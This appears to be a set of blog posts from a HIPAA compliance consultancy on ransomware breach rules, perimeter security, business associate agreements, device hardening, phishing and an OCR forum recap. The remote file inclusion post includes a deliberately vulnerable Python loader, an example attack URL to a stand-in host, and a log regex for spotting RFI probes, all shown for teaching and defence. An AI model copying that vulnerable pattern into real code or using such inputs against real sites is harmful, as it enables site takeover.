Chris Apgar, CISSP


Are All Ransomware Attacks Breaches?

It’s one of those questions that never goes away. The answer is, “Maybe” and very definitely, “Not always.” Contrary to popular belief, even after a ransomware attack, the breach notification safe harbor can still apply. If your PHI was already encrypted before the ransomware attack encrypted (aka “held for ransom”) it, you may very well not have suffered a breach, which means there may be no need to conduct a four-factor risk assessment.

If only it could be so simple. However, per OCR’s weigh-in, you do need to ascertain that the data attacked was encrypted at the time. If it was encrypted, it’s a security incident, but not a data breach. I’ll dig into that shortly.  Far too often I see posts and blogs that adamantly declare, “If a ransomware attack occurs, it must be a breach.”  Not so fast. It’s not so black and white.

OCR has stated that it’s a fact-based determination as to whether or not a breach occurred. If a breach, then you do need to notify OCR, individuals and potentially, the media.  If you run into a consultant (and sometimes counsel) who states that all ransomware attacks absolutely equal a breach, get a second opinion.

Data Encryption & the Burden of Proof

Here’s the flip side – when a ransomware attack turns encrypted PHI into unsecured PHI, and a breach may result. Keep in mind that once you’ve powered up and logged in to your laptop or other mobile device, data may be unencrypted because you’re actively accessing it. When ransomware hits and those files are unencrypted at the time of the attack, you may have a breach of unsecured PHI on your hands.

But – if you do use full disk encryption and your laptop was powered off (meaning the data was still encrypted at rest), or if no files were decrypted at the time of the attack, the PHI was not compromised. No breach occurred.

Also, if the ransomware attack hits your backup media, encrypted at the time of the attack, there is a high likelihood that no PHI breach occurred.  Triple-check to be sure and be able to prove it if OCR comes to call. The burden of proof lies with you.

The burden of proof is greater under other circumstances, such as when a ransomware attack hits PHI that is not encrypted.  At that point, you absolutely need to conduct a four-factor risk assessment.  It bears mentioning, though, that if you have skilled forensic analysts who can prove that no PHI was siphoned off, you still may not be required to notify OCR or individuals, because the PHI was not compromised.

Clearly, it’s not a simple black and white, yes or no answer to the breach question. Be careful. Preserve all evidence. Look closely at the circumstances to make sure no breach occurred that requires notification. But if a consultant or counsel, going on the basis of a blog post, says that you absolutely must notify because ransomware attacks always equal a breach, don’t take my word for it. Just ask OCR.

Compliance Planning includes the “what to do” in the case of a security incident and data breach. Chris Apgar, CISSP and Julia Huddleston, CIPP, CIPM, work with clients nationwide on HIPAA privacy and security compliance, and address the need for assistance with expanded use of electronic health information exchange. They also prep clients for the rigorous process of HITRUST, SOC2 and ISO certifications.

Perimeter Security: It’s the Simple Things That’ll Get You

Are you sure your medical records aren’t accessible by outsiders? Maybe check your perimeter security. I’m not talking about fancy technical security gadgets, but the simple, obvious things like setting a password on your internet-facing applications.

Here’s why I ask. Did you hear about the 187 medical system servers not protected by passwords or other necessary perimeter security measures? Thank the recent ProPublica investigation for that bombshell.  One example: with just a simple data query, a MobilexUSA server exposed the names of more than a million patients!  The investigation uncovered the exposure of names, birthdates, and in some cases, Social Security numbers.

Get back to the basics. Avoid the obvious errors like

  1. leaving default passwords on servers (ask the State of Utah about their massive breach),
  2. not setting passwords at all and other blatant mistakes.

You lose patient trust, and you lose money.  There are notification costs, harm to your reputation, not to mention significant OCR fines.  Another big expense? The regulators’ imposed corrective action plans (CAPs).

Let’s look at the password issue alone. Basic perimeter security doesn’t stop at changing default server passwords and setting an original one.  Take it up a notch. Make sure the passwords you set aren’t easy to guess. Get complex. It doesn’t take a lot of computing power for cybercriminals to crack a simple password.  Take it as a given that you need to set complex passwords on all of your devices.
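To make “get complex” concrete, here’s a minimal sketch in Python of the kind of rule you’d enforce before accepting a new password. The 12-character minimum is illustrative, not a mandated standard, and most directory services or MDM tools can enforce an equivalent policy centrally, which is preferable to ad hoc checks.

```python
import re

def is_complex_enough(password: str, min_length: int = 12) -> bool:
    """Require minimum length plus lowercase, uppercase, digit and symbol."""
    if len(password) < min_length:
        return False
    required_classes = [r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"]
    return all(re.search(pattern, password) for pattern in required_classes)

print(is_complex_enough("admin"))                 # False - the default-password trap
print(is_complex_enough("Gr8!-long-passphrase"))  # True - length plus mixed classes
```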

Too often, it’s the simple things that get you.  If simple mistakes are why your data is exposed to the internet, you’re setting your organization up for an OCR finding of willful neglect.  That will definitely lead to civil penalties or monetary settlements.  Remember, fancy technology isn’t your biggest risk; it’s people and easy mistakes with significant implications.

No doubt, limited resources are an issue for smaller healthcare organizations like small clinics and health information technology (HIT) startups.  On the other hand, the adverse impact of not attending to even simple things can put smaller organizations out of business.  If you’re a smaller organization, or just not sure where to start, try the Office of the National Coordinator for Health Information Technology (ONC). There are plenty of no-cost resources available, like the toolkit for providers. Tackling perimeter security can be overwhelming, which is why it’s essential to start small, with the basics.

Chris Apgar, CISSP, CEO and president of Apgar & Associates, LLC is a nationally known speaker and author. He most recently authored the McGraw-Hill Healthcare Information Technology Exam Guide chapter on the regulatory aspects of health IT. Chris is also a nationally recognized expert and educational instructor on information security, privacy, HIPAA, the HITECH Act, state privacy law, and electronic health information exchange.  

RFI Vulnerability Lesson: Beware of Who You (try to) Hack

Isn’t it rewarding when a fellow security professional posts about an attempted hack of his personal website that he turned into a lesson in website security? And in the end, hacked the hacker? That’s exactly what happened with Larry Cashdollar, a senior security response engineer at Akamai. Cashdollar noticed something peculiar in the logs on his personal website. He dug further and turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.

Before diving into the details: if you’re not sure what an RFI vulnerability is, ask your web development and website management team whether they’re aware of this type of vulnerability.  If they don’t know, they need to do some research to prevent attacks on your websites.  You can satisfy your curiosity – and share with your web team – via this link to more information about it.
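For illustration only – classic RFI most often shows up in PHP-style includes, but the same trust mistake translates to any language – here’s a minimal, hypothetical Python sketch contrasting a page loader that fetches whatever URL the request supplies with one that only serves an allowlist:

```python
import urllib.request

# Server-defined pages only; nothing from the request is used as a path or URL.
ALLOWED_PAGES = {"home": "templates/home.html", "contact": "templates/contact.html"}

def load_page_unsafe(page_param: str) -> str:
    """VULNERABLE: if page_param comes from the request (e.g. ?page=http://evil.example/x),
    the application pulls in and renders attacker-controlled content."""
    with urllib.request.urlopen(page_param) as resp:  # the remote file inclusion
        return resp.read().decode("utf-8", errors="replace")

def load_page_safe(page_param: str) -> str:
    """SAFER: the request can only select from files the server already trusts."""
    path = ALLOWED_PAGES.get(page_param)
    if path is None:
        raise ValueError("unknown page requested")
    with open(path, encoding="utf-8") as f:
        return f.read()
```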

On to the Hacking Attempt

Larry Cashdollar told The Register his site’s logs showed that a  would-be attacker was probing for RFI holes to trick web applications into running a remote malicious script.  The hacker was trying to load a file using a custom tool that Cashdollar had created (!).

The hacker was running a generic test used against websites: figure out an input the application accepts, supply a web address, and see if the site will execute what’s behind it.  Unfortunately for the attacker, Cashdollar used the tool’s logs to trace back to the file the attacker was trying to load. Cashdollar then assessed that file and others the hacker had ready to execute to take over vulnerable websites, and was able to extract the criminal’s email address and preferred language – Portuguese.

What was the purpose of the RFI vulnerability probe? The attacker wanted to install phishing pages masquerading as a legitimate bank’s login webpage, and then direct victims to that page to collect bank account credentials.  It was a way around installing more sophisticated code to capture cryptocurrency.  All it took was redirecting someone to a malicious site, because the fake webpage looked legitimate.

3 Big Takeaways from the RFI Vulnerability Probe

Score one for the good guys! In this case the security professional caught and tracked down the attacker.  We should take it as an alert to everyone responsible for monitoring website security.  From Cashdollar’s account of the incident, the big takeaways for website administrators are the importance of:

  1. Diligently monitoring the audit logs (see the sketch after this list)
  2. Following a solid patching program for site management tools
  3. Writing web code that cannot be exploited for RFI and other known vulnerabilities.
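On the first takeaway, here’s a minimal sketch of what “watching the logs” for RFI probes can look like. It assumes a combined-format access log at an illustrative path and a simple signature (a full URL passed as a query-string value), so treat it as a starting point rather than a detection product:

```python
import re
from pathlib import Path

LOG_FILE = Path("/var/log/apache2/access.log")  # adjust to your web server's log location

# Flag requests that try to pass a full URL in as a parameter value,
# e.g. GET /index.php?page=http://evil.example/shell.txt
RFI_PROBE = re.compile(r"[?&][\w\-\[\]]+=(?:https?|ftp)(?::|%3a)", re.IGNORECASE)

def find_rfi_probes(log_path: Path) -> list[str]:
    """Return log lines whose query strings look like RFI probes."""
    hits = []
    for line in log_path.read_text(errors="replace").splitlines():
        if RFI_PROBE.search(line):
            hits.append(line)
    return hits

if __name__ == "__main__":
    for entry in find_rfi_probes(LOG_FILE):
        print(entry)
```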

If your website developers and administrators don’t know and don’t watch, you may not be as lucky as Cashdollar.

Chris Apgar, CISSP, CEO and president of Apgar & Associates, LLC is a nationally recognized expert and educational instructor on information security, privacy, HIPAA, the HITECH Act, state privacy law and electronic health information exchange.  A nationally known speaker and author, Chris authored the McGraw-Hill Healthcare Information Technology Exam Guide chapter on the regulatory aspects of health IT.

Business Associate or Conduit? Why a BAA likely applies to you.

Ever run into a vendor who claims to be a conduit rather than a business associate (BA)? It happens all too often, in my experience. Here’s the problem: the conduit exception is a narrow one. If you’re storing PHI – even encrypted PHI where you don’t hold the encryption key – you’re a BA. Sign the business associate agreement (BAA); it applies to you.

Not convinced? Let’s look at the preamble to the Omnibus Rule of 2013. HHS said, “The conduit exception is a narrow one and is intended to exclude only those entities providing mere courier services, such as the U.S. Postal Service or United Parcel Service and their electronic equivalents, such as internet service providers (ISPs) providing mere data transmission services. As we have stated in prior guidance, a conduit transports information but does not access it other than on a random or infrequent basis. Thus, document storage companies maintaining protected health information on behalf of covered entities are considered business associates, regardless of whether they actually view the information they hold.”

With that HHS summary in mind, you can see it’s pretty difficult to market services and storage to the healthcare industry without a BAA and think you won’t run afoul of HIPAA. Yet even as recently as a few years ago, our privacy and information security firm would encounter storage vendors and document sharing vendors who would not sign a business associate agreement. Again, just because you can’t access the PHI doesn’t mean you’re not a business associate.

In OCR’s May 2019 guidance, you’ll find a list of BA liabilities. Those remind BAs of their compliance responsibilities under the HIPAA regulations. OCR’s reminder list also notes that BAs have a duty to execute a business associate agreement with their BA subcontractors. What isn’t mentioned, but is required, is that covered entities (CEs) and BAs must execute a BAA with each other.  So if you’re not an internet service provider (ISP), the US Postal Service, or the like, and you store PHI, you need to execute a BAA to comply with HIPAA regulatory requirements.

I’ll end with a cautionary note about vendors convinced they aren’t a business associate. Covered Entities, if your vendor is unwilling to sign a BAA, yet they have access to your PHI, it’s probably a good idea to find another vendor. It may be that your vendor who stores paper charts or other PHI doesn’t realize that they’re a business associate. Or it could be that, in the case of a storage unit, the storage facility owners simply don’t know what’s being stored. But if PHI is involved, then you need to execute a business associate agreement.

Whether you’re a physician practice, a medical transcription service, or a TPA providing a health plan with claims processing services, you’re dealing with HIPAA compliance. Give us a call: 503-384-2538 for help to assure you’re on top of it.

Should you trust Alexa with your health information?

By now you’ve likely heard that Amazon is moving into the HIPAA space with Alexa.  In conjunction with their partners, they’re launching what Amazon calls “HIPAA compliant” apps.  If only it were that easy to create a HIPAA-covered app, or as Amazon calls it, a skill.  As with Amazon Web Services (AWS), it’s ultimately up to the individual developers to honor the law.  While Amazon may well be a trusted third party, if developers don’t build apps or “skills” with privacy, security and HIPAA compliance in mind, I wouldn’t trust Alexa with any of my healthcare data.

Having worked with a number of software development companies in the healthcare space, I can tell you that more often than not developers want to create cool and useful things. The problem with that is cool and useful don’t always automatically align with security and privacy needs. In fact, in the development process you won’t often find security and privacy at the top of the priority list.

Time, Trust & Alexa Users

Trust but verify, folks. If I were the covered entity or business associate planning to eventually trust the Amazon platform to adequately secure protected health information, I would want assurances and proof that the developers of any app/skill have privacy and security baked in.

Granted, Amazon has indicated that trust takes time to build. That it will be a while before patients widely trust Alexa with sensitive health information.  Ok, let’s say we’re down the road a way.  Trust has been earned.  Now we face another potential issue that has nothing to do with the platform or any of its available apps/skills.  The concern lies with the end users.  End users are not always savvy when it comes to protecting sensitive personal information. I think this is where there’s a definite need for some education on the part of partners, Amazon and healthcare providers.

Right now, when Alexa is on, it listens to all voices in the room, all the time. How awful would it be if an end user thought he or she was taking advantage of touted HIPAA compliant solutions but instead was airing sensitive information using another Alexa app?  Hopefully Alexa will also be smart enough to not broadcast protected health information like “You need to follow up with your [insert-private-condition-here] specialist” to the whole house.

Alexa (Amazon), are you listening?

Consumers in the Regulatory Driver’s Seat: Protecting Personal Data Privacy

Consumers on the warpath to protect personal data privacy are making strides in state houses. For instance, here’s an update on Oregon’s Senate Bill 703 on selling health information. If you use Big Data at all, you’ve probably been following this bill. It basically says that anyone selling personal health information, even when thoroughly de-identified, would need to pay the source – i.e., you and me – for the privilege. As you may imagine, research groups and analysts who may touch any Oregonian’s de-identified PHI, not to mention privacy officers at the source of the de-identified data, are watching this closely.

You can likely thank Facebook backlash for this Bill. Taking personal data and sharing it without user knowledge has caused huge problems for the social media giant. Now we’re hearing that they’re going to reel it all in, but how do you get the genie back in the bottle?  The trust is gone, and SB 703 is just one instance of how outraged consumers are at how data is being used.

From a compliance perspective, the information, aka personal data, is already de-identified PHI, so that’s not the basis for the bill. It’s a clear call for personal data privacy protection well beyond what we’ve seen up to now. You can also look at the yet-to-take-effect California Consumer Privacy Act as another example of privacy protection taken to the Nth degree.

This isn’t to say that personal data privacy isn’t important – it absolutely is. It’s merely to point out that the logistical reality of complying with either SB 703 or the CCPA is a nightmare we’ve yet to face. You can hardly blame people for playing ostrich when confronted with such a daunting task. You can also hardly blame people for pushing back on companies being able to use personal information for free.

We’ll be writing more on CCPA and its potential effect on business operations both outside and within the healthcare environment. In the meantime, should Oregon’s SB 703 move further down the path to fruition, we’ll weigh in on that, too.

Need specialized insight on these and other data privacy and information security regulations? Contact Apgar & Associates, LLC at 503-384-2538. Our in-the-trenches knowledge and professional consulting will help you and your workforce with compliance and critical certification preparation.

How to Harden Laptops, Tablets & Smartphones to Protect PHI

When your goal is to protect PHI on laptops and mobile devices, keep in mind that information security is only as strong as its weakest link. Lenient information security standards exponentially increase the risk to sensitive healthcare data. They can also place you in non-compliance with the HIPAA Security Rule. On top of that, the courts are likely to see it as a security failing in the event of a data breach. Now you’re looking at an expensive lawsuit!

An abbreviated overview of the HIPAA Security Rule’s general requirements calls for covered entities and business associates to do the following:

  1. Ensure the confidentiality, integrity, and availability of all electronic protected health information the covered entity or business associate creates, receives, maintains, or transmits.
  2. Protect against any reasonably anticipated threats or hazards to the security or integrity of such information.
  3. Protect against any reasonably anticipated uses or disclosures of such information that are not permitted or required under Subpart E of this part.

Can you demonstrate device encryption?

CEs and BAs, keep in mind, too, that you can’t take advantage of the HIPAA Breach Notification Rule safe harbor if you can’t demonstrate that stolen devices were actually encrypted at the time. If the device isn’t locked down, it’s hard to prove that the device was secure and that no PHI or PII was accessed when it was lost or stolen. While Apple tablets and smartphones are natively encrypted, either end users or IT staff need to enable encryption for Android tablets and smartphones, Windows laptops, tablets and smartphones, and Macs. Take the steps below to protect laptops, tablets and smartphones – and to protect PHI. (A small status-logging sketch follows the first list.)

7 Steps to Laptop Data Security & Intrusion Protection

  1. Remove administrator privileges for all company-owned laptops and lock down devices
  2. Install and maintain mobile device management tools that support:
    1. Remote wipe of hard and flash drives
    2. Device tracking in the event a device is lost or stolen
    3. Enforced encryption of hard drives and flash drives
  3. Install and periodically update anti-malware applications
  4. Install and periodically update firewall applications
  5. Enforce strong passcodes or passwords and require periodic password changes
  6. Enable biometric authentication if available
  7. If using Windows, properly set share and Microsoft New Technology File System (NTFS) permissions to keep network snooping to a minimum and unauthorized users out of sensitive files stored locally
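On the encryption point in particular – and the “prove it” problem from the safe harbor discussion above – here’s a minimal sketch, assuming Windows endpoints and the built-in manage-bde tool; the CSV filename is just illustrative. The value isn’t the check itself, it’s the time-stamped evidence trail you can point to if a device goes missing:

```python
import csv
import datetime
import socket
import subprocess

def bitlocker_protection_on(drive: str = "C:") -> bool:
    """Parse manage-bde -status output for the given drive (Windows only)."""
    result = subprocess.run(
        ["manage-bde", "-status", drive],
        capture_output=True, text=True, check=False,
    )
    return "Protection On" in result.stdout

def record_status(outfile: str = "encryption_evidence.csv") -> None:
    """Append a time-stamped encryption status row for this machine."""
    with open(outfile, "a", newline="") as f:
        csv.writer(f).writerow([
            datetime.datetime.now().isoformat(),
            socket.gethostname(),
            "encrypted" if bitlocker_protection_on() else "REVIEW: protection off or undetermined",
        ])

if __name__ == "__main__":
    record_status()
```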

6 Ways to Protect Tablet & Smart Phone Security & Prevent Intrusion

  1. Remove administrator privileges for all company owned tablets and smartphones and lock down devices
  2. Install and maintain mobile device management tools (company owned and personally owned; BYOD) that support:
    1. Remote wipe of flash drives
    2. Device tracking in the event a device is lost or stolen
    3. Enforced encryption of flash drives (a quick verification sketch follows this list)
    4. Preferably – segregate company data from personal data on BYOD devices
  3. Install and periodically update anti-malware applications (Exception: iPhones and iPads)
  4. Install and periodically update firewall applications (Exception: iPhones and iPads)
  5. Require strong passcodes or passwords and regular password changes
  6. Enable biometric authentication if available
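For the mobile side, here’s a similarly minimal sketch, assuming Android devices reachable over USB with adb on the PATH; it reads the ro.crypto.state property, which reports “encrypted” when storage encryption is enabled. An MDM console is the right tool at scale – this is only a spot-check:

```python
import subprocess

def connected_devices() -> list[str]:
    """Return serial numbers of devices adb currently sees as online."""
    out = subprocess.run(["adb", "devices"], capture_output=True, text=True).stdout
    return [
        line.split()[0]
        for line in out.splitlines()[1:]
        if line.strip().endswith("device")
    ]

def encryption_state(serial: str) -> str:
    """Query the device's storage encryption state ('encrypted' is the goal)."""
    out = subprocess.run(
        ["adb", "-s", serial, "shell", "getprop", "ro.crypto.state"],
        capture_output=True, text=True,
    ).stdout
    return out.strip() or "unknown"

if __name__ == "__main__":
    for serial in connected_devices():
        print(serial, encryption_state(serial))
```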

Device hardening is considered a reasonable security safeguard, which means it’s a “must do” for HIPAA compliance and, in some states, state law compliance. Take the necessary steps to protect PHI and avoid the bad headlines, regulatory penalties, lawsuits and lost business. If you need to beef up compliance planning, conduct your security risk analysis, or just aren’t sure where to start with any of it, give us a call: 503-384-2538.

5 Ways You Can Reduce Phishing Risk

Malware attacks via phishing knocked it out of the park in 2018. Phishing attacks account for an inordinate number of data breaches and compromised networks. In fact, the Identity Theft Resource Center (ITRC) reported that “one-third of all security incidents last year began with a phishing email.” As the cyberattacks get sneakier, everyone – workforce and consumers alike – is at ever-higher risk of a data privacy and security breach.

From fake offers of free World Cup tickets to false GDPR privacy policy notices, 2018’s worst phishing scams cut no corners on creativity. Organizations large and small have implemented penetration testing, aka pen testing, to see how well their technology and their workforce withstand malware attacks. If we’ve learned one thing, it’s that size doesn’t matter to cyberattackers.

5 Pointers to Avoid Getting Hooked

  1. Conduct penetration testing, aka pen testing. Pen testers employ the same tactics as hackers, but to your benefit. You’ll discover how effective your firewalls and patches are as well as how well your workforce “gets” anti-phishing training.
  2. Conduct phishing-specific training. Human error continues to be a big gap in privacy and security effectiveness. One click or tap on a link or attachment opens the gate to phishing malware. Scenario-specific, interactive, out-of-the-box training sessions make the biggest difference.
  3. Stay on top of the latest phishing and smishing (mobile device phishing via text) techniques so you can take measures to prevent systems infiltration as well as keep your workforce alerted.
  4. Encourage transparency internally and externally. Whether it’s an employee who opened the backdoor or a third-party partner, you need to know when security has been breached. Promote admitting “I may have messed up,” and make clear what to do the second it happens (per your security incident response plan).
  5. Keep anti-virus, anti-spam and anti-spyware software current. Hackers are smart cookies but if you’re not on top of essential technology safeguards, they don’t even have to try.

If we were going to choose one tech tip and one human error prevention tip to focus on in Q1, we’d select pen testing and anti-phishing training. One pen testing researcher is so intent on lighting a fire against phishing that he published his scarily successful pen test.

And should all prevention measures fail, you’ll need backup. Which brings us to: Keep recent backup system copies readily accessible. If phishing does get through, you’ll want to be able to quickly go back to a “safe” backup so you can get operations back up and running. With response measures in place, the sooner you know, the faster you can act.
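Here is a minimal sketch of that “readily accessible, recent backup” check, assuming backups land as files in a single directory and using an illustrative 24-hour threshold – adjust both to your own backup design:

```python
import datetime
from pathlib import Path

BACKUP_DIR = Path("/mnt/backups")        # illustrative path - point at your backup target
MAX_AGE = datetime.timedelta(hours=24)   # illustrative freshness threshold

def newest_backup(directory: Path) -> Path | None:
    """Return the most recently modified file in the backup directory, if any."""
    files = [p for p in directory.iterdir() if p.is_file()]
    return max(files, key=lambda p: p.stat().st_mtime, default=None)

def backup_is_recent(directory: Path = BACKUP_DIR,
                     max_age: datetime.timedelta = MAX_AGE) -> bool:
    latest = newest_backup(directory)
    if latest is None:
        return False
    age = datetime.datetime.now() - datetime.datetime.fromtimestamp(latest.stat().st_mtime)
    return age <= max_age

if __name__ == "__main__":
    print("recent backup available" if backup_is_recent() else "ALERT: no recent backup found")
```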

Word of Warning: join.me Does Not Sign Business Associate Agreements

A few days ago, after making multiple attempts on behalf of a client to verify and clarify how join.me supports HIPAA compliance – specifically, whether they sign business associate agreements – I found that they do not. In fact, they do not consider themselves subject to HIPAA regulations, regardless of the possibility of PHI being stored on the join.me platform. Therefore – as you’ll see in the exchange below – they “do not sign BAAs.”

So, a warning to those who use join.me and store recordings that include PHI on the join.me platform – join.me is unwilling to execute a business associate agreement with covered entities and business associates. If you need a video communications platform that supports the storage of PHI and is HIPAA compliant, it’s wise to look elsewhere.

Below is a reprint from a warning I posted on LinkedIn just the other day. Please feel free to share your experiences of similar situations and vendors with me in the comments area on that post. Here’s my email exchange with join.me.

Original Question/Comment

I’m attempting to get an answer one last time. I represent a mutual customer who currently uses join.me who is required to comply with HIPAA. Given the fact that protected health information (PHI) may be stored on join.me‘s platform in the form of recordings, join.me is required to sign a business associate agreement with my client. If join.me is unable or unwilling to sign a business associate agreement, I need to recommend that my client change to another conferencing platform such as Zoom or WebEx who will sign a business associate agreement.

On Dec 2, 2018, at 6:42 PM, join.me Support wrote:

Hello Chris,

Thank you for contacting join.me.

We actually do not sign BAAs because our services are not HIPAA compliant as HIPAA compliance, per se, is applicable only to entities covered by HIPAA regulations (e.g., healthcare organizations).

That being said the technical security controls employed in the join.me service and associated host and client software can meet or exceed HIPAA technical standards. But again, we are unable to sign any BAA’s.

If we have answered your question, we will send you an email in the next few days asking for your feedback. We value your opinion and thank you in advance for taking the time to click on the survey link and letting us know how your experience was with our team.

Thanks again for using join.me.

L***  | Customer Support Representative
LogMeIn, Inc.

My reply to join.me

You (join.me) answered my question. My client will be looking for another vendor. While the functionality may be there to secure the data, my client would be violating HIPAA by continuing to use the join.me platform. As the US Department of Health and Human Services, Office for Civil Rights has stated, claiming to not be a business associate doesn’t mean you actually aren’t one. I also feel a need to remind covered entities and business associates they shouldn’t be contracting with join.me if the platform will be used to store recordings that contain PHI.

Chris Apgar, CISSP
www.apgarandassoc.com

My Recommendation

Ultimately, I had to recommend that the client not use join.me but instead look into online video and document storage with vendors who will sign BAAs, such as Zoom or Webex. The instance serves as a reminder that no matter how technically secure a vendor professes to be, if you plan to use their platform or services for anything pertaining to PHI, there needs to be a BAA in place, documenting that they follow the HIPAA regulatory requirements that relate to PHI protection. And as I indicated to the customer support representative above, claiming that you’re not a business associate doesn’t magically transform you into not being one!

Chris is a frequent LinkedIn Pulse contributor. You can connect with him here, and you can follow Apgar and Associates on LinkedIn here.

Privacy & Security Forum Update: OCR Activity, Audit Protocols, Ransomware & the HIPAA Security Rule

Julia and I had the pleasure of attending the 2018 Privacy & Security Forum a couple of weeks ago.  One of the sessions I attended was focused on what’s happening at OCR these days.  The speaker was Roger Severino, Director of OCR, and the moderator was Adam Greene, partner at Davis Wright Tremaine, LLP.  I heard about new OCR activity, got an answer to my question about the future use of the OCR audit protocols, and key OCR takeaways.  I have the pleasure of passing the Forum’s highlights on to you.

OCR audit protocols use.

The big news to me was the answer to one of my questions about the OCR audit protocols.  For over a year, we’ve been saying that OCR will likely use the audit protocols updated for the phase 2 audits in its investigations and enforcement activity.  I took the opportunity to ask the top authority at OCR about future use of the protocols.  Mr. Severino confirmed it – that’s just what OCR intends to do, and may already be doing.

Other OCR activity includes:

  • Updating HIPAA/FERPA guidance (jointly with the US Department of Education)
  • Issuing a notice of proposed rulemaking (NPRM) or request for information (RFI) on the HITECH Act accounting of disclosures language (the last NPRM was not well received by the industry and privacy advocates)
  • Evaluating ways OCR can distribute funds received as part of enforcement related civil monetary penalties and settlement agreements to victims of breaches of their PHI

That’s a fair amount of activity.  The only caveat is we don’t know how soon “soon” is.

The FBI and FTC weigh in on ransomware attacks.

I also attended a session that featured speakers from the FBI and the FTC.  Along with Mr. Severino, the FBI speaker said the first step covered entities and business associates should take if attacked by ransomware is to contact the FBI.  The FBI has agents in place to investigate ransomware and help covered entities and business associates get their data back without paying a ransom.  This is something to keep in mind when you’re updating your security incident response plans, especially given that local law enforcement may not have the resources to assist with an investigation.

Is the HIPAA Security Rule being updated?

There has been much talk over the past few years about the need to update the HIPAA Security Rule.  The Director indicated that he thinks there is nothing fundamentally broken with the Security Rule, so it’s unlikely the rule will be amended any time soon.  The Security Rule is technology neutral and flexible.  It hasn’t become obsolete due to changes in technology, and there has been a lot of change since compliance became mandatory in 2005.

OCR phase 2 audit results and plans for enforcement.

Mr. Severino shared that OCR was finalizing phase 2 audits and results will be published soon.  As far as the audit program goes, he indicated that there would likely be no more formal audits.  Instead, the audits would become part of OCR’s enforcement activity.  He believes this promotes an enforcement mindset with a higher-level rigor, similar to enforcement activity conducted by the US Department of Justice.

An audience member asked if enforcement would continue unabated or would be curtailed under this administration.  The answer: OCR is still on track with enforcement.  Mr. Severino would like to see enforcement go down as a reflection of the expansion of a culture of compliance, which OCR has been pushing since 2011.  He did add that the industry was far from there today.

Adam Greene asked Mr. Severino to provide three takeaways for the audience.  The Director said:

  1. You need to treat PHI as if it was a bar of gold. That includes conducting periodic risk analyses, encrypting PHI and securing mobile devices.
  2. “We’re from the government and we’re here to help” – tap into OCR resources through its website, the most popular website for the US Department of Health & Human Services.
  3. “Help us help you” – review NPRMs, RFIs, and other items OCR would like industry input on, and provide feedback. Periodically check regulations.gov for opportunities to give OCR feedback.

All in all, it was a great conference, and good to get information straight from the proverbial horse’s mouth.  Julia will be sharing information about some of the sessions she attended.  Look for more in the weeks to come!

 
